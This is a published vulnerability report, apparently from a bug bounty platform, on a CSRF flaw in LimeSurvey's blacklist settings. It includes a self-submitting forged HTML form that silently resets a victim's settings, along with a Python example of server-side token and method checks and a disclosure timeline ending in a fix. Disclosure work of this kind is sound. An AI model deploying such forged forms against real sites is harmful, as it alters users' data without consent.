CSRF edit Blacklist settings (YES to NO) in limesurvey/limesurvey

Valid

Reported on

Sep 30th 2023


Description

CSRF edit Blacklist settings

Proof of Concept

1. For example, all of the data fields in the Blacklist settings are set to YES.

2. The attacker sends the user a page containing a forged form:

<html>
  <body>
    <form action="https://haido456.limesurvey.net/admin/participants/sa/storeBlacklistValues">
      <input type="hidden" name="YII&#95;CSRF&#95;TOKEN" value="" />
      <input type="hidden" name="blacklistallsurveys" value="0" />
      <input type="hidden" name="blacklistnewsurveys" value="0" />
      <input type="hidden" name="blockaddingtosurveys" value="0" />
      <input type="hidden" name="hideblacklisted" value="0" />
      <input type="hidden" name="deleteblacklisted" value="0" />
      <input type="hidden" name="allowunblacklist" value="0" />
      <input type="hidden" name="yt0" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

3. When the user opens it, the form is submitted and the settings are changed to NO, which the user did not want.
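The PoC form above carries an empty YII_CSRF_TOKEN and has no method attribute, so a browser submits it as a GET request; the endpoint accepted it anyway. The following is an added example of the server-side checks that stop this pattern; it is not code from the report or from LimeSurvey. The handler name store_blacklist_values, the issue_csrf_token helper and the in-memory SESSIONS store are assumptions made for the example; the form field names are the ones used in the PoC.

```python
import hmac
import secrets

# Constructed stand-in for a server session store: session id -> CSRF token.
SESSIONS = {}

# Field names taken from the PoC form; the submit button (yt0) is ignored.
BLACKLIST_FIELDS = (
    "blacklistallsurveys",
    "blacklistnewsurveys",
    "blockaddingtosurveys",
    "hideblacklisted",
    "deleteblacklisted",
    "allowunblacklist",
)


def issue_csrf_token(session_id):
    """Bind a fresh, unguessable token to the session and return it.

    The token is what the legitimate settings page embeds in its own form;
    a third-party page cannot read it because of the same-origin policy.
    """
    token = secrets.token_hex(32)
    SESSIONS[session_id] = token
    return token


def store_blacklist_values(method, session_id, form):
    """Hypothetical state-changing handler.

    Returns (status, result): result is the parsed settings on 200 and a
    short reason string otherwise. A request is applied only when it is a
    POST whose non-empty token equals the token stored for the session.
    """
    # 1. State changes must not be reachable via GET. The PoC form has no
    #    method attribute, so the browser sends it as GET.
    if method.upper() != "POST":
        return 405, "method not allowed"

    # 2. An absent or empty token (the PoC sends value="") fails closed, and
    #    the comparison is constant-time so timing does not leak the token.
    submitted = form.get("YII_CSRF_TOKEN", "")
    expected = SESSIONS.get(session_id)
    if not submitted or expected is None or not hmac.compare_digest(submitted, expected):
        return 403, "invalid CSRF token"

    # 3. Only now parse the settings; a missing field is an error, not a
    #    silent default to "0"/NO.
    try:
        settings = {name: form[name] == "1" for name in BLACKLIST_FIELDS}
    except KeyError as err:
        return 400, "missing field %s" % err.args[0]
    return 200, settings


def forged_request_from_poc():
    """Replay the PoC: every field set to 0 and an empty token, sent as GET."""
    form = {name: "0" for name in BLACKLIST_FIELDS}
    form["YII_CSRF_TOKEN"] = ""
    form["yt0"] = "Save"
    return store_blacklist_values("GET", "victim-session", form)


def legitimate_request(session_id):
    """A request from the real settings page, which carries the session's token."""
    form = {name: "1" for name in BLACKLIST_FIELDS}
    form["YII_CSRF_TOKEN"] = SESSIONS[session_id]
    return store_blacklist_values("POST", session_id, form)


if __name__ == "__main__":
    issue_csrf_token("victim-session")
    print("forged PoC request:", forged_request_from_poc())
    print("legitimate request:", legitimate_request("victim-session"))
```

With the check in place the replayed PoC is rejected before any setting is touched, first by the method check and, if an attacker switched the form to method="POST", by the empty-token check; only the request built from the page that holds the real token reaches the settings update.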

Payload Poc

https://drive.google.com/file/d/1AedqQB1uE47M6EAjjytbtEQRRjmZyC_0/view?usp=sharing

Video Poc

https://drive.google.com/file/d/14IQ3AGsT9raKCyT0KMFYVMqWciyiBWtL/view?usp=sharing

Impact

Trick users into taking unwanted actions.

We are processing your report and will contact the limesurvey team within 24 hours. (5 months ago)
HaiNguyen modified the report (5 months ago)
We have contacted a member of the limesurvey team and are waiting to hear back. (5 months ago)
HaiNguyen
5 months ago

Researcher


Hi, any new update?

HaiNguyen
5 months ago

Researcher


Any new update?

tiborpacalat
5 months ago

Internal tracking number: 19165

tiborpacalat validated this vulnerability (4 months ago)
hainguyen0207 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
tiborpacalat marked this as fixed in 6.3.2+231031 with commit 238c39 (4 months ago)
The fix bounty has been dropped
This vulnerability has now been published (4 months ago)